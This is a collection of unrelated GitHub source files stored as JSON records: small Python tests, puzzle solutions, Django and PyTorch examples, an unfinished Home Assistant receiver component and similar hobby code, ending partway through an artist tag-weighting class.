+{"seq_id":"33554381112","text":"# pylint: disable=unused-variable\nfrom aiohttp import web\nimport pytest\n\n\n@pytest.mark.parametrize(\n ['params'],\n [\n ({'lines': ['first', 'second'], 'logins': ['user_1']},),\n ({'logins': ['user_2']},),\n ({'lines': ['first', 'new']},),\n ({},),\n ],\n)\nasync def test_chatterbox_stats(web_app_client, params, mock_chatterbox_py3):\n @mock_chatterbox_py3('/v1/users/statuses', prefix=True)\n def handler(request):\n assert request.query.getall('lines', []) == params.get('lines', [])\n assert request.query.getall('logins', []) == params.get('logins', [])\n return web.json_response(\n {\n 'users': [\n {\n 'current_status': 'online',\n 'time_spent_in_status': 60,\n 'login': 'user_1',\n 'lines': ['first', 'second'],\n },\n {\n 'current_status': 'offline',\n 'time_spent_in_status': 120,\n 'login': 'user_2',\n 'lines': ['new'],\n },\n ],\n },\n )\n\n params_to_send = {}\n for key, value in params.items():\n if isinstance(value, list):\n value = '|'.join(value)\n params_to_send[key] = value\n response = await web_app_client.get(\n '/v1/chatterbox/users/stat', params=params_to_send,\n )\n data = await response.json()\n\n assert data == {\n 'users': [\n {\n 'current_status': 'online',\n 'time_spent_in_status': 60,\n 'login': 'user_1',\n 'lines': ['first', 'second'],\n },\n {\n 'current_status': 'offline',\n 'time_spent_in_status': 120,\n 'login': 'user_2',\n 'lines': ['new'],\n },\n ],\n }\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/test_support_metrics/web/test_get_users_stat.py","file_name":"test_get_users_stat.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"73871887890","text":"with open(\"input.txt\") as f:\n count = 0\n for line in f.readlines():\n line = line[:-1]\n vals = line.split(\",\")\n a = vals[0].split(\"-\")\n b = vals[1].split(\"-\")\n\n alo = int(a[0])\n ahi = int(a[1])\n\n blo = int(b[0])\n bhi = int(b[1])\n\n # a\n if (alo <= blo and ahi >= bhi) or (blo <= alo and bhi >= ahi):\n count += 1\n\n # b\n # if not (ahi < blo or bhi < alo):\n # count += 1\n\n print(count)\n","repo_name":"david-j-xu/2022-Advent-of-Code","sub_path":"04/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"37236076437","text":"from leads.models import Lead,Suggestion,List,Favorite\nfrom leads.serializers import LeadSerializer,SuggestionSerializer,ListSerializer,FavoriteSerializer,AddFavoriteSerializer,MyFavoriteSerializer\nfrom rest_framework import generics\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponse, JsonResponse\nfrom rest_framework.parsers import JSONParser\nfrom leads.scrape import get_data\n\n\nclass LeadListCreate(generics.ListCreateAPIView):\n queryset = Lead.objects.all()\n serializer_class = LeadSerializer \n\nclass SuggestionListCreate(generics.ListCreateAPIView):\n queryset = Suggestion.objects.all()\n serializer_class = SuggestionSerializer \n\nclass ListListCreate(generics.ListCreateAPIView):\n queryset = List.objects.all()\n serializer_class = ListSerializer \n\nclass FavoriteListCreate(generics.ListCreateAPIView):\n queryset = Favorite.objects.all()\n serializer_class = FavoriteSerializer \n\nclass SuggestionGet(generics.RetrieveAPIView):\n queryset = Suggestion.objects.all()\n serializer_class = SuggestionSerializer \n\n# class FavoriteGet(generics.RetrieveAPIView):\n# queryset = Favorite.objects.all()\n# serializer_class = FavoriteSerializer \n\n\n@csrf_exempt\ndef my_favorites(request):\n if not request.user.is_authenticated:\n return JsonResponse(status=403)\n\n if request.method == 'GET':\n #id = request.user.id\n favorites = Favorite.objects.filter(author__exact=request.user)\n serializer = MyFavoriteSerializer(favorites, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n@csrf_exempt\ndef add_favorite(request):\n if not request.user.is_authenticated:\n auth=dict()\n auth['message']='No authentification'\n return JsonResponse(auth, status=403)\n\n if request.method == 'POST':\n data = JSONParser().parse(request)\n data['author'] = request.user.id\n data['list'] = '1'\n #TODO: now always first list, later need to think which id to take\n # data['list_id'] = '1' #List.objects.get(pk=1).id\n serializer = FavoriteSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data, status=201)\n return JsonResponse(serializer.errors, status=400)\n\n@csrf_exempt\ndef is_auth(request):\n auth_data = dict()\n if request.user.is_authenticated:\n auth_data['auth'] = True\n user_data = dict()\n user_data['username']=request.user.username\n auth_data['user'] = user_data\n else:\n auth_data['auth'] = False\n return JsonResponse(auth_data, status=200)\n\n@csrf_exempt\ndef add_suggestion(request):\n if not request.user.is_authenticated:\n return JsonResponse(status=401)\n\n if request.method == 'POST':\n data = JSONParser().parse(request)\n data['author'] = request.user.id\n\n webpage_data = get_data(data['link'])\n if webpage_data['title']:\n data['title'] = webpage_data['title']\n\n if webpage_data['description']:\n dots_mark = '..'\n if len(webpage_data['description']) < 295:\n dots_mark = ''\n data['description'] = webpage_data['description'][:295] + dots_mark \n else:\n data['description'] = webpage_data['title']\n\n if webpage_data['keywords']:\n data['keywords'] = webpage_data['keywords'][:295]\n \n\n #TODO: get image from webpage\n if webpage_data['type']=='youtube':\n #get image\n data['image']=data['link']\n else:\n data['image']=data['link']\n\n\n #TODO: add to model: keywords and author (just to see who is using it)\n #get data from POST request\n #get data from webpage, if it exists, if there is some data etc\n # save the suggestion\n # save the same 
suggestion to users favorites\n\n # import pdb;pdb.set_trace()\n serializer = SuggestionSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data, status=201)\n return JsonResponse(serializer.errors, status=400)\n","repo_name":"arvis/langlearn","sub_path":"project/leads/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"30130750934","text":"import torch\nfrom torch import nn \nfrom torch.nn import init\nimport numpy as np\nimport sys\nsys.path.append(\"..\") \nimport d2lzh_pytorch as d2l\n#构建网络\nnum_inputs, num_outputs, num_hiddens = 784, 10, 256\nnet = nn.Sequential(\n d2l.FlattenLayer(),\n nn.Linear(num_inputs,num_hiddens),\n nn.ReLU(),\n nn.Linear(num_hiddens,num_outputs)\n)\n#初始化参数\nfor params in net.parameters():\n init.normal_(params,mean=0,std=0.01)\n#定义损失函数\nloss = nn.CrossEntropyLoss()#分开定义softmax运算和交叉熵损失函数可能会造成数值不稳定,pytorch提供了包括softmax运算和交叉熵损失计算的函数\n#定义优化器\noptimizer = torch.optim.SGD(net.parameters(), lr=0.5)\n#读取数据\nbatch_size = 256\ntrain_iter, test_iter = d2l.load_data_fashion_mnist(batch_size)\n#训练模型\nnum_epochs = 5\nd2l.train_ch3(net, train_iter, test_iter, loss, num_epochs, batch_size, None, None, optimizer)","repo_name":"zhangsx19/pytorch-exercise","sub_path":"MLPpytorch实现.py","file_name":"MLPpytorch实现.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"41073512218","text":"from typing import List\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nclass Solution:\n def inorderTraversal(self, root: TreeNode) -> List[int]:\n if root == None:\n return []\n if root.left == None and root.right == None:\n return [root.val]\n ret = []\n if root.left:\n ret.extend(self.inorderTraversal(root.left))\n ret.append(root.val)\n if root.right:\n ret.extend(self.inorderTraversal(root.right))\n return ret\n\n","repo_name":"felixchr/leetcode","sub_path":"p0094_binary_tree_inorder_travesal.py","file_name":"p0094_binary_tree_inorder_travesal.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"74422224849","text":"\"\"\"\nSupport for interface with a AnthemAV Receiver.\n\nFor more details about this platform, please refer to the documentation at\nhttps://home-assistant.io/components/media_player/\n\"\"\"\nimport logging\nimport socket\nimport select\nimport time\nimport re\nimport voluptuous as vol\n\n\nfrom homeassistant.components.media_player import (\n SUPPORT_TURN_OFF, SUPPORT_VOLUME_MUTE, SUPPORT_VOLUME_SET,\n SUPPORT_SELECT_SOURCE, SUPPORT_VOLUME_STEP, MediaPlayerDevice,\n PLATFORM_SCHEMA)\nfrom homeassistant.const import (\n CONF_HOST, CONF_NAME, STATE_OFF, STATE_ON, STATE_UNKNOWN, CONF_PORT)\nimport homeassistant.helpers.config_validation as cv\n\n_LOGGER = logging.getLogger(__name__)\n\nDEFAULT_NAME = 'AnthemAV'\nDEFAULT_MRXZONE = 1\nCONF_MRXZONE = \"mrxzone\"\nCONF_MINVOL = \"minvol\"\nCONF_MAXVOL = \"maxvol\"\nDEFAULT_MINVOL = -60\nDEFAULT_MAXVOL = -30\n# CONF_TIMEOUT = \"timeout\"\n# CONF_BUFFER_SIZE = \"buffer_size\"\n# DEFAULT_TIMEOUT = 10\n# DEFAULT_BUFFER_SIZE = 1024\n# mrx_payload = \"payload\"\nCONF_MRXMODEL = \"mrxmodel\"\nDEFAULT_MRXMODEL = \"x00\"\n\nSUPPORT_ANTHEMMRX = SUPPORT_SELECT_SOURCE | SUPPORT_VOLUME_STEP | \\\n SUPPORT_VOLUME_SET | SUPPORT_VOLUME_MUTE | SUPPORT_TURN_OFF\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({\n vol.Required(CONF_HOST): cv.string,\n vol.Required(CONF_PORT): cv.port,\n vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,\n vol.Optional(CONF_MRXMODEL, default=DEFAULT_MRXMODEL): cv.string,\n vol.Optional(CONF_MRXZONE, default=DEFAULT_MRXZONE): cv.positive_int,\n vol.Optional(CONF_MINVOL, default=DEFAULT_MINVOL): vol.Coerce(float),\n vol.Optional(CONF_MAXVOL, default=DEFAULT_MAXVOL): vol.Coerce(float),\n # vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): cv.positive_int,\n})\n\n\ndef setup_platform(hass, config, add_devices, discovery_info=None):\n \"\"\"Setup the AnthemAV platform.\"\"\"\n add_devices([AnthemAV(hass, config)])\n return True\n\n\nclass AnthemAV(MediaPlayerDevice):\n \"\"\"Representation of a AnthemAV Receiver.\"\"\"\n\n def __init__(self, hass, config):\n \"\"\"Initialize the AnthemAV device.\"\"\"\n\n self._name = config.get(CONF_NAME)\n self._muted = None\n self._volume = 0\n self._state = STATE_UNKNOWN\n self._response = None\n self._lastupdatetime = None\n self._selected_source = ''\n self._source_name_to_number = {v: k for k,\n v in mrx_sources.items()}\n self._source_number_to_name = mrx_sources\n self._config = {\n CONF_NAME: config.get(CONF_NAME),\n CONF_HOST: config[CONF_HOST],\n CONF_PORT: config[CONF_PORT],\n CONF_MRXZONE: config.get(CONF_MRXZONE, DEFAULT_MRXZONE),\n CONF_MINVOL: config.get(CONF_MINVOL, DEFAULT_MINVOL),\n CONF_MAXVOL: config.get(CONF_MAXVOL, DEFAULT_MAXVOL),\n CONF_TIMEOUT: config.get(CONF_TIMEOUT, DEFAULT_TIMEOUT),\n CONF_BUFFER_SIZE: config.get(\n CONF_BUFFER_SIZE, DEFAULT_BUFFER_SIZE),\n }\n self.update()\n\n def update(self):\n \"\"\"Retrieve the latest data.\"\"\"\n\n @property\n def source(self):\n \"\"\"Return the current input source.\"\"\"\n return self._selected_source\n\n @property\n def source_list(self):\n \"\"\"List of available input sources.\"\"\"\n return list(self._source_name_to_number.keys())\n\n def select_source(self, source):\n \"\"\"Select input source.\"\"\"\n _LOGGER.info(\"Select Source: %s\",\n self._source_name_to_number.get(source))\n\n @property\n def name(self):\n \"\"\"Return the name of the device.\"\"\"\n return self._name\n\n @property\n def state(self):\n \"\"\"Return the state of the device.\"\"\"\n return self._state\n\n 
@property\n def volume_level(self):\n \"\"\"Volume level of the media player (0..1).\"\"\"\n return self._volume\n\n @property\n def is_volume_muted(self):\n \"\"\"Boolean if volume is currently muted.\"\"\"\n return self._muted\n\n @property\n def supported_media_commands(self):\n \"\"\"Flag of media commands that are supported.\"\"\"\n return SUPPORT_ANTHEMMRX\n\n def turn_off(self):\n \"\"\"Turn off media player.\"\"\"\n\n def turn_on(self):\n \"\"\"Turn off media player.\"\"\"\n\n def volume_up(self):\n \"\"\"Volume up the media player.\"\"\"\n\n def volume_down(self):\n \"\"\"Volume down media player.\"\"\"\n\n def mute_volume(self, mute):\n \"\"\"Send mute command.\"\"\"\n\n def set_volume_level(self, volume):\n \"\"\"Set volume level, range 0..1.\"\"\"\n mrxvol = int(((self._config[CONF_MAXVOL]\n - self._config[CONF_MINVOL])\n * volume) - (0 - self._config[CONF_MINVOL]))\n\n\n\n# new class for mrx control\n\n # object for each model type with commands and regex\n # volume_up\n # volume_down\n # volume_set\n # volume_get\n # power_on\n # power_off\n # power_get\n # mute_on\n # mute_off\n # mute_toggle\n # mute_get\n # source_set\n # source_get\n\n# Use regex with named groups\n# >>> m = re.match(r\"(?P\\w+) (?P\\w+)\", \"Malcolm Reynolds\")\n# >>> m.group('first_name')\n# 'Malcolm'\n# >>> m.group('last_name')\n# 'Reynolds'\n# combine dictionary\n\n# Use format tags\n\n# use server client method like squeezebox to limit polling of mrx\n\n # # initialise mrx:\n # mrx.initialise(host, port, model)\n # mrx.initialise(192.168.2.200, 4998, 'x00')\n # models: x00, x10, x20\n\n # # store mrx response in object:\n # mrx.state.[zone].[state]\n # mrx.state.[1].volume = -60\n # mrx.state.[1].mute = 0\n # mrx.state.[1].source = 3\n # mrx.state.[1].power = 1\n # store timestamp of last received command\n\n # # commands:\n # mrx.[command](zone, value)\n # mrx.setvolume(1, -60)\n # mrx.setsource(1, 1), use source numbers\n # mrx.setmute(1, 0), options 0, 1, T\n # mrx.setpower(1, 1), options 0, 1\n\n # # Update:\n # mrx.update()\n # optional: limit to 5 seconds since last complete set of information\n\n # # Socket connection:\n # Current: open, send, receive, close every command.\n # optional: open socket connection and watch all responses.\n","repo_name":"tinglis1/anthemav","sub_path":"_HA Component/anthemav.py","file_name":"anthemav.py","file_ext":"py","file_size_in_byte":6277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"73424511249","text":"#2048(Easy)\n'''\ndfs()함수 다시 이해해보기\ndfs 알고리즘 공부 필요!!\n재귀함수 너무 어렵다..\n'''\nimport sys,copy\n\ndef move(direction):\n if direction==0: #위쪽 방향으로 이동\n for j in range(n):\n idx=0 #0행부터 차례대로 검사하기 위한 변수\n for i in range(1,n):\n if board[i][j]: #0이 아니라면\n temp=board[i][j] #temp에 값 일시 저장\n board[i][j]=0 #블럭이 옮겨졌다고 생각하고 0으로 수정\n if board[idx][j]==0: #위쪽이 비어있으면\n board[idx][j]=temp #저장한 temp값을 위쪽으로 옮김\n elif board[idx][j]==temp: #저장한 값과 위쪽에 있는 값이 같으면\n board[idx][j]=temp*2 #블록 합침\n idx+=1 #그 다음 행을 탐색하기 위해서\n else: #위쪽이 비어있지도, 같은 블럭도 아니라면\n idx+=1 #그 위에 블럭을 쌓아야 하기 때문에 idx먼저 증가 시킨 후\n board[idx][j]=temp #임시저장한 값을 그대로 다시 보드에 넣음\n\n elif direction == 1: #아래로 이동\n for j in range(n):\n idx = n - 1 #보드의 맨 아래 행\n for i in range(n - 2, -1, -1):\n if board[i][j]: #옮길 블럭이 있다면\n temp = board[i][j] #temp에 값 일시 저장 후\n board[i][j] = 0 #블럭을 옮겼다 치고 0으로 수정\n if board[idx][j] == 0: #비어있다면\n board[idx][j] = temp #임시저장한 값 넣음 (아래로 이동)\n elif board[idx][j] == temp: #옮길 값(temp)와 아래에 있는 블럭이 같다면\n board[idx][j] = temp * 2 #블럭 합침\n idx -= 1 #블럭이 쌓임\n else:\n idx -= 1\n board[idx][j] = temp\n\n elif direction == 2: #왼쪽으로 이동\n for i in range(n):\n idx = 0 #열을 나타 냄\n for j in range(1, n):\n if board[i][j]:\n temp = board[i][j]\n board[i][j] = 0\n if board[i][idx] == 0:\n board[i][idx] = temp\n elif board[i][idx] == temp:\n board[i][idx] = temp * 2\n idx += 1\n else:\n idx += 1\n board[i][idx] = temp\n\n else: #오른쪽으로 이동\n for i in range(n):\n idx = n - 1\n for j in range(n - 2, -1, -1):\n if board[i][j]:\n temp = board[i][j]\n board[i][j] = 0\n if board[i][idx] == 0:\n board[i][idx] = temp\n elif board[i][idx] == temp:\n board[i][idx] = temp * 2\n idx -= 1\n else:\n idx -= 1\n board[i][idx] = temp\n\ndef dfs(count):\n global maxBlock,board\n if count==5: #최대 5번 움직였다면 멈추고 전체 배열의 최대 값을 반환\n for i in range(n):\n for j in range(n):\n maxBlock=max(maxBlock,board[i][j])\n return\n copyBoard=copy.deepcopy(board) #이동 전 보드의 상태 저장\n for i in range(4):\n move(i) #move()함수로 이동 뒤\n dfs(count+1) #재귀적으로 호출\n board=copy.deepcopy(copyBoard)\n\nn=int(sys.stdin.readline())\nboard=[]\nfor i in range(n):\n board.append(list(map(int,sys.stdin.readline().split())))\nmaxBlock=0\ndfs(0)\nprint(maxBlock)","repo_name":"dbswl4951/baekjoon_algorithm","sub_path":"backjoon_algorithm/implementation/ex12100.py","file_name":"ex12100.py","file_ext":"py","file_size_in_byte":3887,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"16682343267","text":"#!/usr/bin/python3\n\"\"\"This script will check utf-8 validity\"\"\"\n\n\ndef validUTF8(data):\n \"\"\"This script will return true if given list is a valid UTF-8\"\"\"\n num_bytes = 0\n for i in range(len(data)):\n bits = format(data[i], '#010b')[-8:]\n if bits[0] == '0':\n continue\n else:\n for bit in bits:\n if bit != '0':\n num_bytes += 1\n else:\n break\n if num_bytes == 1 or num_bytes >= 5:\n return False\n if (num_bytes > 1 and num_bytes <= 4):\n after_byte = i + 1\n last_byte = i + num_bytes\n if (after_byte > len(data) or last_byte > len(data)):\n return False\n for j in range(after_byte, last_byte):\n new_bits = format(data[j], '#010b')[-8:]\n if not (new_bits[0] == '1' and new_bits[1] == '0'):\n return False\n else:\n continue\n return True\n return True\n","repo_name":"samie-ya/alx-interview","sub_path":"0x04-utf8_validation/0-validate_utf8.py","file_name":"0-validate_utf8.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"42911449339","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\n\n# Include the `fusioncharts.py` file which has required functions to embed the charts in html page\nfrom fusioncharts import FusionCharts\n\n# Loading Data from a Static JSON String\n# It is a example to show a MsCombi 2D chart where data is passed as object.\n# The `chart` method is defined to load chart data\ndef chart(request):\n\n datasource = {}\n datasource[\"chart\"] = {\n \"caption\": \"Actual Revenues, Targeted Revenues & Profits\",\n \"subcaption\": \"Last year\",\n \"xaxisname\": \"Month\",\n \"yaxisname\": \"Amount (In USD)\",\n \"numberprefix\": \"$\",\n \"theme\": \"ocean\"\n }\n datasource[\"categories\"] = [{\n \"category\": [\n {\"label\": \"Jan\"},\n {\"label\": \"Feb\"},\n {\"label\": \"Mar\"},\n {\"label\": \"Apr\"},\n {\"label\": \"May\"},\n {\"label\": \"Jun\"},\n {\"label\": \"Jul\"},\n {\"label\": \"Aug\"},\n {\"label\": \"Sep\"},\n {\"label\": \"Oct\"},\n {\"label\": \"Nov\"},\n {\"label\": \"Dec\"}\n ]\n }]\n\n datasource[\"dataset\"] = [{\n \"seriesname\": \"Actual Revenue\",\n \"data\": [\n {\"value\": \"16000\"},\n {\"value\": \"20000\"},\n {\"value\": \"18000\"},\n {\"value\": \"19000\"},\n {\"value\": \"15000\"},\n {\"value\": \"21000\"},\n {\"value\": \"16000\"},\n {\"value\": \"20000\"},\n {\"value\": \"17000\"},\n {\"value\": \"25000\"},\n {\"value\": \"19000\"},\n {\"value\": \"23000\"}\n ]\n }, {\n \"seriesname\": \"Projected Revenue\",\n \"renderas\": \"line\",\n \"showvalues\": \"0\",\n \"data\": [\n {\"value\": \"15000\"},\n {\"value\": \"16000\"},\n {\"value\": \"17000\"},\n {\"value\": \"18000\"},\n {\"value\": \"19000\"},\n {\"value\": \"19000\"},\n {\"value\": \"19000\"},\n {\"value\": \"19000\"},\n {\"value\": \"20000\"},\n {\"value\": \"21000\"},\n {\"value\": \"22000\"},\n {\"value\": \"23000\"}\n ]\n }, {\n \"seriesname\": \"Profit\",\n \"renderas\": \"area\",\n \"showvalues\": \"0\",\n \"data\": [\n {\"value\": \"4000\"},\n {\"value\": \"5000\"},\n {\"value\": \"3000\"},\n {\"value\": \"4000\"},\n {\"value\": \"1000\"},\n {\"value\": \"7000\"},\n {\"value\": \"1000\"},\n {\"value\": \"4000\"},\n {\"value\": \"1000\"},\n {\"value\": \"8000\"},\n {\"value\": \"2000\"},\n {\"value\": \"7000\"}\n ]\n }\n ]\n\n # Create an object for the mscombi2d chart using the FusionCharts class constructor\n mscombi2dChart = FusionCharts(\"mscombi2d\", \"ex1\", \"100%\", 400, \"chart-1\", \"json\", datasource)\n # returning complete JavaScript and HTML code, which is used to generate chart in the browsers. 
\n pyramidChart = FusionCharts(\"pyramid\", \"ex2\", \"70%\", \"385\", \"chart-2\", \"json\", \n \"\"\"{\n \"chart\": {\n \"bgcolor\": \"FFFFFF\",\n \"caption\": \"Revenue distribution for 2017\",\n \"basefontcolor\": \"333333\",\n \"decimals\": \"0\",\n \"numbersuffix\": \"M\",\n \"numberprefix\": \"$\",\n \"pyramidyscale\": \"40\",\n \"chartbottommargin\": \"0\",\n \"captionpadding\": \"0\",\n \"showborder\": \"0\"\n },\n \"data\": [\n {\n \"value\": \"17\",\n \"name\": \"Products\",\n \"color\": \"008ee4\"\n },\n {\n \"value\": \"21\",\n \"name\": \"Services\",\n \"color\": \"6baa01\"\n },\n {\n \"value\": \"20\",\n \"name\": \"Consultancy\",\n \"color\": \"f8bd19\"\n },\n {\n \"value\": \"5\",\n \"name\": \"Others\",\n \"color\": \"e44a00\"\n }\n ]\n }\"\"\")\n\n # Create an object for the funnel chart using the FusionCharts class constructor\n funnelChart = FusionCharts(\"funnel\", \"ex3\", \"70%\", \"385\", \"chart-3\", \"json\", \n \"\"\"{\n \"chart\": {\n \"bgcolor\": \"FFFFFF\",\n \"caption\": \"Conversion - 2017\",\n \"decimals\": \"1\",\n \"basefontsize\": \"11\",\n \"issliced\": \"0\",\n \"ishollow\": \"1\",\n \"labeldistance\": \"8\",\n \"showBorder\": \"0\"\n },\n \"data\": [\n {\n \"label\": \"Website Visits\",\n \"value\": \"385634\"\n },\n {\n \"label\": \"Downloads\",\n \"value\": \"145631\",\n \"color\": \"008ee4\"\n },\n {\n \"label\": \"Interested to Participate\",\n \"value\": \"84564\",\n \"color\": \"f8bd19\"\n },\n {\n \"label\": \"Contracts finalized\",\n \"value\": \"50654\",\n \"color\": \"6baa01\"\n },\n {\n \"label\": \"Adquired\",\n \"value\": \"25342\",\n \"color\": \"e44a00\"\n }\n ]\n }\"\"\")\n\n pie3d = FusionCharts(\"pie3d\", \"ex4\" , \"80%\", \"400\", \"chart-4\", \"json\", \n # The data is passed as a string in the `dataSource` as parameter.\n \"\"\"{ \n \"chart\": {\n \"caption\": \"Age profile of website visitors\",\n \"subcaption\": \"Last Year\",\n \"startingangle\": \"120\",\n \"showlabels\": \"0\",\n \"showlegend\": \"1\",\n \"enablemultislicing\": \"0\",\n \"slicingdistance\": \"15\",\n \"showpercentvalues\": \"1\",\n \"showpercentintooltip\": \"0\",\n \"plottooltext\": \"Age group : $label Total visit : $datavalue\",\n \"theme\": \"ocean\"\n },\n \"data\": [\n {\"label\": \"Teenage\", \"value\": \"1250400\"},\n {\"label\": \"Adult\", \"value\": \"1463300\"},\n {\"label\": \"Mid-age\", \"value\": \"1050700\"},\n {\"label\": \"Senior\", \"value\": \"491000\"}\n ]\n }\"\"\")\n # returning complete JavaScript and HTML code, which is used to generate chart in the browsers. \n return render(request, 'index.html', {'mscombi2dChart' : mscombi2dChart.render(), 'pyramidChart' : pyramidChart.render(),\n 'funnelChart' : funnelChart.render(), 'pie3d': pie3d.render()})","repo_name":"Brunux/subscriber-backend","sub_path":"analytics/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"39729302943","text":"import cv2\nimport math\n\n\n\ncap = cv2.VideoCapture(r\"F:\\计算机设计大赛\\计设数据集\\最终数据集视频\\2023_4_19_成功1.avi\")\nframeRate = cap.get(5) # frame rate\nif not cap.isOpened():\n print('error')\n exit(-1)\nwhile (cap.isOpened()):\n frameId = cap.get(1) # current frame number\n ret, frame = cap.read()\n if (ret != True):\n break\n if frameId % math.floor(frameRate) == 0:\n filename = '../Dataset/oriData/image_2_' + str(int(frameId)) + \".png\"\n try:\n cv2.imwrite(filename, frame)\n except:\n print('error occur, maybe img folder not exist')\ncap.release()\nprint (\"Done!\")","repo_name":"tsieyy/data_augmentation","sub_path":"tools/avi2jpg.py","file_name":"avi2jpg.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"39534498596","text":"import random, sys, copy\nfrom src.Camera import Camera\n\n\nclass State:\n def __init__(self, problem, cameras=None):\n self.problem = problem\n self.cameras = []\n self.cameras = cameras if cameras is not None else self.generateCameras()\n self.energy = sys.maxsize\n self.coverage_energy = None\n self.camera_cost = None\n self.redundancy_cost = None\n\n def getRandomFreePointFromRoom(self):\n free_points = self.getFreePoints()\n if not free_points:\n error = \"Exception in State.getRandomFreePointFromRoom: no points left!\"\n raise RuntimeError(error)\n else:\n return random.choice(free_points)\n\n def getFreePoints(self):\n def isCameraPos(cls, pos):\n for c in cls.cameras:\n if c.x == pos[0] and c.y == pos[1]:\n return True\n return False\n\n return list(filter(lambda p: not isCameraPos(self, p), self.problem.inside_points))\n\n def generateCameras(self):\n cameras = []\n for _ in range(self.problem.min_number_of_cams):\n cameras.append(Camera(self.problem, self.getRandomFreePointFromRoom()))\n\n return cameras\n\n def generateNeighbour(self, camera_move_method):\n # deep copy cameras\n cameras = [copy.copy(c) for c in self.cameras]\n\n transformation = self.randomlyChooseTransformationMethod(cameras)\n\n # perform transformation\n if transformation == 'insert':\n new_camera = Camera(self.problem, self.getRandomFreePointFromRoom())\n cameras.append(new_camera)\n elif transformation == 'remove':\n cameras.remove(random.choice(self.cameras))\n elif transformation == 'move':\n to_modify = random.choice(self.cameras)\n if camera_move_method == 'local':\n to_modify.move()\n elif camera_move_method == 'random':\n to_modify.move(self.getRandomFreePointFromRoom())\n else:\n raise RuntimeError(\"Wrong move camera method!\")\n else:\n raise RuntimeError(\"Wrong transformation method!\")\n\n return State(self.problem, cameras)\n\n def randomlyChooseTransformationMethod(self, cameras):\n free_points = self.getFreePoints()\n choices = set()\n\n if len(cameras) <= 1:\n choices.add('insert')\n else:\n choices.add('remove')\n if len(free_points) > 0:\n choices.update({'insert', 'move'})\n return random.choice(tuple(choices))\n","repo_name":"wfranus/cameras","sub_path":"src/State.py","file_name":"State.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"}
+{"seq_id":"29988229208","text":"import math\n\nfrom Artist import Artist\nfrom ArtistTags import ArtistTags\nfrom TagArtistWeights import TagArtistWeights\n\nclass ArtistWeightCalc:\n \"\"\"\n Calculates the weights of artists to tags they have been assigned to.\n\n For instance, artists tagged only as \"funk\" are weighted higher than\n artists tagged partially as \"funk\".\n \"\"\"\n\n def __init__(self):\n # Tags used fewer times will be excluded from the graph\n self._minTagCount = 0\n\n # Map from artistId to artist object\n # Ensures uniqueness of Artist objects to save memory\n self._artists = {}\n\n # Stores the relationship between artists and tags\n self._artistTags = ArtistTags()\n\n def setMinTagCount(self, minTagCount):\n self._minTagCount = minTagCount\n\n def add(self, artistId, artistName, tag, tagCount):\n artistId = artistId.lower()\n artistName = artistName.lower()\n tag = tag.lower()\n\n # Get the artist. O(1) on average\n artist = None\n if artistId in self._artists:\n artist = self._artists[artistId]\n else:\n artist = Artist(artistId, artistName)\n self._artists[artistId] = artist\n \n self._artistTags.add(artist, tag, tagCount)\n\n return artist\n\n def pruneTags(self):\n tagsToRemove = []\n\n for tag in self._artistTags.getTags():\n if not self._acceptTag(tag):\n tagsToRemove.append(tag)\n\n for tag in tagsToRemove:\n artistsWithNoTags = self._artistTags.remove(tag)\n\n for artist in artistsWithNoTags:\n del self._artists[artist.getId()]\n\n def getTagToArtistsWeights(self):\n # Dictionary from tag to (Artist, weight)\n tagArtistWeights = TagArtistWeights()\n\n totalTagCount = self._artistTags.getTagCount() \n\n for tag in self._artistTags.getTags():\n currentTagCount = self._artistTags.getTotalTagCount(tag)\n\n for artist in self._artistTags.getArtistsWithTag(tag):\n artistTagCount = self._artistTags.getTagCountOfArtist(tag, artist)\n # Number of times the artist appears for the tag / number of artist songs for tag\n tf = artistTagCount / currentTagCount\n # loge(number of tags / number of tags with artist)\n idf = math.log(totalTagCount / self._artistTags.getArtistTagCount(artist))\n\n #print('For Artist %s with tag %s' %(artist.getName(), tag))\n #print(' tf = %d / %d = %.3f' %(artistTagCount, currentTagCount, tf))\n #print(' idf = log(%d / %d) = %.3f' %(totalTagCount, self._artistTags.getArtistTagCount(artist), idf))\n #print(' tf*idf = %.3f' %(tf * idf))\n\n tfidf = tf * idf\n\n tagArtistWeights.add(tag, artist, tfidf)\n\n return tagArtistWeights\n\n def _acceptTag(self, tag):\n \"\"\" Flags to disregard 